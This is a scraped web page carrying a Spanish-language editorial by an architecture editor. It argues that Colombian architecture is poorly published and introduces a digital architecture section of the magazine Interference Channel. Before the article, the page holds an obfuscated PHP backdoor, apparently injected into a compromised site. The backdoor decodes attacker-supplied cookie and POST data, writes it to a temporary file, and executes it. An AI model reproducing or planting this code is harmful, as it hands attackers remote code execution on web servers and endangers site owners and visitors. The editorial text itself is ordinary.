$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Extraños Errores de GRAVEDAD – www.interferencechannel.com

Extraños Errores de GRAVEDAD

¿Para qué y cómo hacer una editorial digital sobre arquitectura?

 

Fue un E R R O R grave haber entrado al Jardín Botánico de Medellín por el parqueadero, cuando tan solo era un estudiante de arquitectura en 2010. Pero fue por otro E R R O R que pude conocer su patio de entrada. En la tienda, me aburrí y sin querer, de repente, estaba en medio de este gran umbral. En la universidad había aprendido a amar los patios; Este me dejó sin respiración.

La ignorancia está en el origen de esos dos errores, desafortunados y afortunados a la vez. Al origen de la ignorancia está la falta de investigación pero también está la falta de DIVULGACIÓN de la información. El proyecto, que luego de mi visita aprendí, fue diseñado por Ana Elvira Vélez y Lorenzo Castro, no había sido muy divulgado. Todavía no lo ha sido. Uno de los pocos lugares donde se puede encontrar es en la página web de la arquitecta. http://www.anaelviravelez.com/index.php/espacio-publico/jardin-botanico/

La publicación, edición, divulgación de la arquitectura son mecanismos básicos que permiten  difundir la obra de un arquitecto para que pueda ser aprendida, comprendida, interpretada y finalmente transformada en otros proyectos por otros arquitectos. (No estoy diciendo nada nuevo).

Pero es extraño. Como ya dije no es un proyecto muy publicado. Es difícil estudiarlo. Es DIFÍCIL estudiar a Lorenzo Castro. Es difícil estudiar la arquitectura contemporánea en Colombia.

Eso es extraño. Un reciente socio de Lorenzo, Rem Koolhaas, hace ya unas décadas nos enseñó todo lo contrario. Lo nuestro, lo de los arquitectos es auto-publicarnos. Recientemente, su mejor aprendiz Bjarke Ingels, lo ha sabido llevar a los más altos estándares con publicaciones recientes como Hot to Cold y con videos como este https://vimeo.com/130208585 . Silencio absoluto, aplausos y venia. (con apenas 40 años ya tiene oficina en Dinamarca y Nueva York, en donde está por terminar su primer edificio, es uno de los dos arquitectos de Google y con el video anunció su segundo rascacielos en la Gran Manzana). ¿Habrá influido su afán de auto-publicación en su rápido acceso a los proyectos más ambiciosos del mundo?

Ricardo Abuauad, un arquitecto y académico chileno, recientemente explicó, en su introducción a la presentación del libro Blanco Montaña en Colombia (un libro sobre la arquitectura contemporánea chilena) que uno de los cinco puntos en común de la arquitectura chilena que explican su reciente éxito mundial es la edición y publicación de sus obras. La publicación y el éxito no deben ser simplemente entendidos como una eficiente estrategia de marketing (que no deja de ser muy importante y bastante mal vista en el gremio), sino como una posibilidad de revisarse, mejorarse, estudiarse y sobre todo transformarse como grupo, como gremio, como sociedad.

Insisto, esta idea no es novedad. Para los que poco creen en la arquitectura contemporánea y mucho alaban a la moderna, recuerden que Le Corbusier creó la revista L’Esprit Nouveau en sus primeros años en París para la divulgación tanto de su obra como de sus teorías sobre arquitectura, arte y estética. Esta revista fue el origen de otra publicación: el libro Vers Une Nouvelle Architecture.

Por eso es extraño. Nosotros somos arquitectos. A diferencia de artistas y diseñadores, somos ajenos a las patentes, porque bien sabemos, como explica Hardt sobre lo común, que nuestro oficio avanza mejor, que podemos superar la gravedad más rápido, si tenemos acceso a la información de la arquitectura que ya se ha pensado y construido. La edición es a la arquitectura lo que las columnas al edificio: sin ella no soporta la gravedad y desaparece. Desaparece porque no se reproduce o trans-FORMA en nuevas arquitecturas, en nuevos desafíos de la gravedad.

En Colombia, pocos lo han sabido hacer. Extrañamente uno de los tantos arquitectos importantes que se ha auto-publicado un libro es Daniel Bermúdez; en el 2011  publicó 4 º lat. n 2.600 msnm (http://www.ciudadviva.gov.co/portal/node/230). Un año antes Giancarlo Mazzanti ya lo había hecho con Mesa Editores: Alfabetos (http://www.archdaily.co/co/02-49399/alfabetos-variaciones-en-la-arquitectura-de-giancarlo-mazzanti-mesa-editores). Esta casa editorial se ha encargado de publicar, desde Medellín,  libros como Archipiélago que recoge la obra de diferentes estudios de arquitectura de Medellín y de Bogotá de las nuevas generaciones. También tiene publicaciones sobre la obra y teoría de Felipe Mesa y otros textos sobre arquitectura. (http://mesaeditores.blogspot.com/search/label/Archipi%C3%A9lago%20de%20arquitectura)  Existen además otros medios diferentes del libro para dar a conocer el conocimiento de la arquitectura. Ejemplos como la reciente exposición (que solamente pasó por Medellín) de Luis Callejas dan cuenta que el conocimiento común de la arquitectura tiene (y debe producir) muchas maneras de ser transmitido. (http://www.archdaily.co/co/760656/excursiones-dibujos-y-fotografias-de-luis-callejas-medellin-colombia)

Y a pesar de estos y otros ejemplos, la divulgación  del conocimiento arquitectónico es corta y sin potencia.

Este último punto es el origen de la Línea Editorial de Arquitectura de Interference Channel. Esta sección de la revista se convertirá en una biblioteca primero digital (cuyos temas mensuales, no obstante, se convertirán en publicaciones físicas) de consulta sobre arquitectura. Con posturas críticas, textos CÁLIDOS pero siempre antes DESCRIPTIVOS intentaremos crear un lugar común para la arquitectura colombiana de consulta, referencia e investigación.

La obra y teoría extranjera entrará en nuestras publicaciones como punto de comparación y de investigación para la comunidad arquitectónica.

Usaremos la tecnología que, según Stiegler, nos permitirá subjetivarnos, transformarnos como sociedad. Internet, es hoy la herramienta tecnológica más COMÚN para integrarnos y comunicarnos. Y es a través de un espacio común virtual de la arquitectura (Interference Channel) que podemos hacerlo como grupo, actualmente fragmentado y poco auto-referenciado.

La tecnología también será una herramienta para sacar ese conocimiento del poder de los arquitectos y entregárselo a cualquier interesado. La ventaja de internet es que su información tiende a difundirse masivamente; el libro físico no. La ventaja de internet es que nos permite hacer uso de videos; el libro no.

Lo nuestro NO es encontrar una arquitectura colombiana. Basta con observar la diversidad actual de sus principales exponentes para entender que a pesar de que la mayoría tienen objetivos comunes, todos utilizan medios diferentes para alcanzarlos (desafortunadamente hay que excluir la arquitectura comercial de este generalización). Hacemos arquitecturas muy diferentes pero con objetivos comunes.

Nosotros vamos a reunirlas, a nuestras arquitecturas, bajo diferentes temas mensuales y en diferentes formatos, para relacionarlas y en ese orden divulgarlas. Pretendemos, como también lo pretende la edición del mes de Junio, INTERFERIR con publicaciones en los medios digitales para que los arquitectos o curiosos puedan luego transformar  eso que llamamos arquitectura que se construye en eso que llamamos sociedad. Queremos publicar y divulgar el E R R O R para hacer de lo extraño, un extrañamiento, un encantamiento del mundo.

Para esto, hemos reunido en nuestro primer trabajo una serie de proyectos en torno al puente; puentes que interfieren con el paisaje, puentes que lo complementan, puentes efímeros, puentes en construcción, puentes poco conocidos y todos puentes que superan una interferencia.

Disfrútenlo, compártanlo, utilícenlo, estúdienlo, transfórmenlo. ♦

Pablo LORENZANA

Editor Arquitectura, Arquitecto, Columnista

@lorenzanarch (Instagram)

Envíenos sus trabajos y sugerencias a editorarquitectura@interferencechannel.com

Agradecimientos

Para esta primera edición de arquitectura queremos agradecer a todo El Equipo Mazzanti y especialmente a Giancarlo Mazzanti, Mariana Bravo, Carlos Medellín y Rocío Lamprea… Agradecemos a Maria Elvira Madriñan por informarnos sobre la visión de Rogelio Salmona en relación al  proyecto de la 26 y a Humberto Mora por hacer el artículo y hacer el contacto con ellos. También queremos agradecer a Carlos Hernández, Rafael Esguerra, Manuel Villa, Oficina Informal y Antonio Yemail, Javier Vera, Adriano Aljure, Santiago Pardo, Pablo Forero y Taller 301 por la colaboración para hacer posible las publicaciones de este mes. Finalmente, un agradecimiento especial a Estudio El Cajón, Néstor Peña, Jaime Muñoz, Camilo Constain,  Sofía Camargo y Patricia Tobón por la ayuda en la publicaciones audiovisuales

Comments are closed.